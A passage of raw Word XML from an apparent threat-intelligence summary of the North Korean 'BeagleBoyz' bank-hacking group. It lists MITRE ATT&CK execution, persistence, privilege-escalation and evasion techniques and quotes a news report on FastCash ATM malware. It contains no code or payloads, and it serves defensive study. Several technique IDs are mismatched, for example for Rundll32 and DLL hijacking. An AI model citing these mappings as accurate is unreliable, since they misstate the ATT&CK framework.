        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Steal the credentials of a specific user or service account to bypass access controls and gain increased privileges (Valid Accounts [T1078])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5020A4F6" w14:textId="77777777" w:rsidR="001D029F" w:rsidRDefault="001D029F" w:rsidP="001D029F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Breach organizations that have access to the intended victim’s organization and exploit their trusted relationship (Trusted Relationship [T1199])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445C59ED" w14:textId="2F6B5FBF" w:rsidR="001D029F" w:rsidRDefault="001D029F" w:rsidP="001D029F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use remote services to initially access and persist within a victim’s network (External Remote Services [T1133])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4544F0B0" w14:textId="7C9D6346" w:rsidR="00B85297" w:rsidRDefault="00B85297" w:rsidP="00B85297"/>
    <w:p w14:paraId="3CF6759B" w14:textId="4EEFA8B5" w:rsidR="00B85297" w:rsidRDefault="004E230F" w:rsidP="00B85297">
      <w:r w:rsidRPr="004E230F">
        <w:t xml:space="preserve">After gaining initial access to targeted financial institutions via means like spearfishing, social engineering and watering hole attacks, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E230F">
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E230F">
        <w:t xml:space="preserve"> lure victims into downloading malware such as "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E230F">
        <w:t>FastCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E230F">
        <w:t>," which targets AIX servers used by financial institutions. Once the malware is on an institution's servers, it can "intercept financial request messages and reply with fraudulent, but legitimate-looking, affirmative response messages to enable extensive ATM cash outs," the alert says.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId109" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>North Korea's '</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>BeagleBoyz</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>' target banks with ATM cash-out attacks (techtarget.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="232B1375" w14:textId="77777777" w:rsidR="000D0495" w:rsidRPr="001E71E8" w:rsidRDefault="000D0495" w:rsidP="000D0495">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E71E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469637CF" w14:textId="77777777" w:rsidR="000D0495" w:rsidRDefault="000D0495" w:rsidP="000D0495">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> selectively exploit victim computer systems after initially compromising a computer connected to a financial institution’s corporate network. After gaining initial access to a financial institution’s corporate network, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> are selective in which victim systems they further exploit. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use a variety of techniques to run their code on local and remote victim systems [Execution [TA0002]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE7E4E8" w14:textId="77777777" w:rsidR="000D0495" w:rsidRDefault="000D0495" w:rsidP="000D0495"/>
    <w:p w14:paraId="5A45508D" w14:textId="77777777" w:rsidR="000D0495" w:rsidRDefault="000D0495" w:rsidP="000D0495">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use command-line interfaces to interact with systems and execute other software (Command and Scripting Interpreter [T1059])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30301ADF" w14:textId="77777777" w:rsidR="000D0495" w:rsidRDefault="000D0495" w:rsidP="000D0495">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use scripts (e.g., VBScript and PowerShell) to speed up operational tasks, reduce the time required to gain access to critical resources, and bypass process monitoring mechanisms by directly interacting with the operating system (OS) at an Application Programming Interface (API) level instead of calling other programs </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(Command and Scripting Interpreter: PowerShell [T1059.001], Command and Scripting Interpreter: Visual Basic [T1059.005])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4083BB32" w14:textId="77777777" w:rsidR="000D0495" w:rsidRDefault="000D0495" w:rsidP="000D0495">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Rely upon specific user actions, such as opening a malicious email attachment (User Execution [T1204])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B1535E" w14:textId="77777777" w:rsidR="000D0495" w:rsidRDefault="000D0495" w:rsidP="000D0495">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit software vulnerabilities to execute code on a system (Exploitation for Client Execution [T1203])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D80DB2" w14:textId="77777777" w:rsidR="000D0495" w:rsidRDefault="000D0495" w:rsidP="000D0495">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Create new services or modify existing services to execute executables, commands, or scripts (System Services: Service Execution [T1569.002])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C92499F" w14:textId="77777777" w:rsidR="000D0495" w:rsidRDefault="000D0495" w:rsidP="000D0495">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Employ the Windows module loader to load Dynamic Link Libraries (DLLs) from arbitrary local paths or arbitrary Universal Naming Convention (UNC) network paths and execute arbitrary code on a system (Shared Modules [T1129])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031F1815" w14:textId="77777777" w:rsidR="000D0495" w:rsidRDefault="000D0495" w:rsidP="000D0495">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use the Windows API to execute arbitrary code on the victim's system (Native API [T1106])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEB7D66" w14:textId="77777777" w:rsidR="000D0495" w:rsidRDefault="000D0495" w:rsidP="000D0495">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use a system's graphical user interface (GUI) to search for information and execute files (Remote Services [T1021])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17368C80" w14:textId="77777777" w:rsidR="000D0495" w:rsidRDefault="000D0495" w:rsidP="000D0495">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task/Job [T1053])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B8B7D5" w14:textId="77777777" w:rsidR="000D0495" w:rsidRDefault="000D0495" w:rsidP="000D0495">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Abuse compiled Hypertext Markup Language (HTML) files (.chm), commonly distributed as part of the Microsoft HTML Help system, to conceal malicious code (Signed Binary Proxy Execution: Compiled HTML File [T1218.001])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23713C19" w14:textId="77777777" w:rsidR="000D0495" w:rsidRDefault="000D0495" w:rsidP="000D0495">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Abuse Windows rundll32.exe to execute binaries, scripts, and Control Panel Item files (.CPL) and execute code via proxy to avoid triggering security tools (Signed Binary Proxy Execution: Rundl32 [T1218.001])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9C138D" w14:textId="1CA2F07B" w:rsidR="000D0495" w:rsidRDefault="000D0495" w:rsidP="000D0495">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in Linux and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>launchd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in macOS systems to create pre-scheduled and periodic background jobs (Scheduled Task/Job: Cron [T1053.003], Scheduled Task/Job: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Launchd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [T1053.004])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1906153C" w14:textId="77777777" w:rsidR="001E71E8" w:rsidRPr="001E71E8" w:rsidRDefault="001E71E8" w:rsidP="001E71E8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E71E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19694E27" w14:textId="77777777" w:rsidR="001E71E8" w:rsidRDefault="001E71E8" w:rsidP="001E71E8">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use many techniques to maintain access on compromised networks through system restarts, changed credentials, and other interruptions that could affect their access (Persistence [TA0003]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E80036" w14:textId="77777777" w:rsidR="001E71E8" w:rsidRDefault="001E71E8" w:rsidP="001E71E8"/>
    <w:p w14:paraId="1A5D13DA" w14:textId="77777777" w:rsidR="001E71E8" w:rsidRDefault="001E71E8" w:rsidP="001E71E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add an entry to the “run keys” in the Registry or an executable to the startup folder to execute malware as the user logs in under the context of the user’s associated permissions levels (Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Execution: Registry Run Keys / Startup Folder [T1547.001])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCF4BF6" w14:textId="77777777" w:rsidR="001E71E8" w:rsidRDefault="001E71E8" w:rsidP="001E71E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Install a new service that can be configured to execute at startup using utilities to interact with services or by directly modifying the Registry (Create or Modify System Process: Windows Service [T1543.003])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA21E4B" w14:textId="77777777" w:rsidR="001E71E8" w:rsidRDefault="001E71E8" w:rsidP="001E71E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Compromise an openly accessible web server with a web script (known as web shell) to use the web server as a gateway into a network and to serve as redundant access or persistence mechanism (Server Software Component: Web Shell [T1505.003])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C70FBE3" w14:textId="77777777" w:rsidR="001E71E8" w:rsidRDefault="001E71E8" w:rsidP="001E71E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Manipulate accounts (e.g., modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed) to maintain access to credentials and certain permission levels within an environment (Account Manipulation [T1098])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557C08BB" w14:textId="77777777" w:rsidR="001E71E8" w:rsidRDefault="001E71E8" w:rsidP="001E71E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Steal the credentials of a specific user or service account to bypass access controls and retain access to remote systems and externally available services (Valid Accounts [T1078])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1267E2E6" w14:textId="77777777" w:rsidR="001E71E8" w:rsidRDefault="001E71E8" w:rsidP="001E71E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task/Job [T1053])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367859C9" w14:textId="77777777" w:rsidR="001E71E8" w:rsidRDefault="001E71E8" w:rsidP="001E71E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Abuse the Windows DLLs search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence (Hijack Execution Flow: DLL Search Order Hijacking [T1056.004])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421951C1" w14:textId="77777777" w:rsidR="001E71E8" w:rsidRDefault="001E71E8" w:rsidP="001E71E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit hooking to load and execute malicious code within the context of another process to mask the execution, allow access to the process’s memory, and, possibly, gain elevated privileges (Input Capture: Credential API Hooking [T1574.001])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F04F50" w14:textId="3F292800" w:rsidR="001E71E8" w:rsidRDefault="001E71E8" w:rsidP="001E71E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use remote services to persist within a victim’s network (External Remote Services [T1133])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C52B78F" w14:textId="77777777" w:rsidR="0013479E" w:rsidRPr="0013479E" w:rsidRDefault="0013479E" w:rsidP="0013479E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013479E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C58E22E" w14:textId="77777777" w:rsidR="0013479E" w:rsidRDefault="0013479E" w:rsidP="0013479E">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> often seek access to financial institutions’ systems that have tiered user and system accounts with customized privileges. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> must overcome these restrictions to access necessary systems, monitor normal user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, and install and execute additional malicious tools. To do so, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have used the following techniques to gain higher-level permissions on a system or network (Privilege Escalation [TA0004]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E9FADE" w14:textId="77777777" w:rsidR="0013479E" w:rsidRDefault="0013479E" w:rsidP="0013479E"/>
    <w:p w14:paraId="3349EFBD" w14:textId="77777777" w:rsidR="0013479E" w:rsidRDefault="0013479E" w:rsidP="0013479E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inject code into processes to evade process-based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and elevate privileges (Process Injection [T1055])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367EFE60" w14:textId="77777777" w:rsidR="0013479E" w:rsidRDefault="0013479E" w:rsidP="0013479E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Install a new service that can be configured to execute at startup using utilities to interact with services or by directly modifying the Registry (Create or Modify System Process: Windows Service [T1543.003])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F1851D" w14:textId="77777777" w:rsidR="0013479E" w:rsidRDefault="0013479E" w:rsidP="0013479E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Compromise an openly accessible web server with web shell to use the web server as a gateway into a network (Server Software Component: Web Shell [T1505.003])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8C7404" w14:textId="77777777" w:rsidR="0013479E" w:rsidRDefault="0013479E" w:rsidP="0013479E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution as part of lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task/Job [T1053])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034B8610" w14:textId="77777777" w:rsidR="0013479E" w:rsidRDefault="0013479E" w:rsidP="0013479E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Steal the credentials of a specific user or service account to bypass access controls and grant increased privileges (Valid Accounts [T1078])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0362C7AB" w14:textId="77777777" w:rsidR="0013479E" w:rsidRDefault="0013479E" w:rsidP="0013479E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit hooking to load and execute malicious code within the context of another process to mask the execution, allow access to the process’s memory, and, possibly, gain elevated privileges (Input Capture: Credential API Hooking [T1574.001])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9292E8" w14:textId="77777777" w:rsidR="0013479E" w:rsidRDefault="0013479E" w:rsidP="0013479E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perform </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (sometimes referred to as “super user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>do</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">”) caching or use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Soudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file to elevate privileges in Linux and macOS systems (Abuse Elevation Control Mechanism: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Caching [T1548.003])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F054A7" w14:textId="2F33CBBC" w:rsidR="0013479E" w:rsidRDefault="0013479E" w:rsidP="0013479E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Execute malicious payloads by hijacking the search order used to load DLLs (Hijack Execution Flow: DLL Search Order Hijacking [T1574.001])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381D9663" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRPr="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5742A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5742A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621F24A9" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:r>
        <w:t xml:space="preserve">Throughout their exploitation of a financial institution’s computer network, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have used different techniques to avoid detection by OS security features, system and network security software, and system audits (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Evasion [TA0005]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCE5949" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A"/>
    <w:p w14:paraId="0A4422F5" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit code signing certificates to masquerade malware and tools as legitimate binaries and bypass security policies that allow only signed binaries to execute on a system (Subvert Trust Controls Signing [T1553.002])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FDD7E2" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove malware, tools, or other non-native files dropped or created throughout an intrusion to reduce their footprint or as part of the post-intrusion </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cleanup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> process (Indicator Removal on Host: File Deletion [T1070.004])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4FF2DD" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inject code into processes to evade process-based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Process Injection [T1055])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0924C235" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use scripts (such as VBScript and PowerShell) to bypass process monitoring mechanisms by directly interacting with the OS at an API level instead of calling other programs (Command and Scripting Interpreter: PowerShell [T1059.001], Command and Scripting Interpreter: Visual Basic [T1059.005])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623B2E63" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attempt to make an executable or file challenging to discover or </w:t>
